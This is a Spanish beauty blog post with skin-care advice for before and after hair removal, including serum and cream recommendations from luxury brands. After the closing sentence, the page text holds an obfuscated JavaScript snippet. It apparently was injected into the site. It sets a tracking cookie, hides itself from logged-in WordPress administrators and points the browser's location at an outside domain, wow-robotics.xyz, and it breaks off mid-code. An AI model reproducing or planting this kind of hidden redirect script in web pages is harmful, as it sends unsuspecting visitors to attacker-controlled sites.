Hoy en día existen multitud de métodos depilatorios, pero está claro que hay algunos más suaves y otros más agresivos. Aun así, la piel sufre y es necesario tener cuidados previos, durante y después de realizar la depilación.

Seguro que estás terminando con la depilación láser o vas a comenzar con la cera o con máquina de depilar. La aparición de pequeños granitos sonrosados o irritación de la piel suele ser habitual cuando se elimina el vello. Como trucos para preparar la piel antes de depilarte y abrir los poros es una ducha de agua caliente, aplicar hielo en la zona a depilar, ya que la adormece.

 

depilacion

 

Inmediatamente después de la depilación

 Una vez realizada la depilación con el método que más te convenga, la piel estará mucho más sensible y seca de lo habitual. En este caso, la primera recomendación es huir del calor y del sol durante al menos, y dependiendo del tipo de depilación utilizada, 48 horas. Esto incluye baños calientes, piscinas o jacuzzis, y es importante utilizar protección solar, aunque sea para ir a la calle.

Lo mejor sería una ducha de agua templada y utilizar productos naturales o serum. Un serum que nos gusta mucho es Aromessence de Decléor, compuesto por Aceites Esenciales de Rosa Damascena, Manzanilla Romana, Neroli y Petit-Grain, que ha sido específicamente formulado para el tratamiento de pieles sensibles.

Si tienes la piel seca, o tras la depilación se te queda así, Fluide de Beaité 14 de Carita es un tratamiento ideal, ya que funciona tanto para pieles como cabellos secos o muy secos, dejando la piel elástica y suave. Para un alivio inmediato tras la depilación, o sencillamente porque quieres nutrir y reparar tu piel, Confort Extrême de Sisley te ayudará.

Por último, para una piel sensible y expuesta a estrés o contaminación, recomendamos La Solution 10 de Chanel, compuesto por sólo 10 ingredientes y con triple poder de té Silver Needle, muy apreciado y exclusivo.

 

consejosdepilación

 

Días después de la depilación

Además de todos estos productos y consejos dados para cuando realices la depilación, es interesante que evites fricción sobre la zona, utilizando ropa ancha que no apriete la piel y deje respirar los poros hasta que se cierren. También es recomendable que evites el desodorante o cualquier producto perfumado o que lleve alcohol, ya que puede irritar aún más la piel.

Días después de la depilación, intenta exfoliar la piel para eliminar la piel muerta e incorpora una crema hidratante en tu cuidado diario, ya que así estará preparada para todo, y por supuesto, bebe mucha agua.

consejosdepilacion

 

¡Ya estás lista para disfrutar de no tener ni un vello en el cuerpo y disfrutar! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone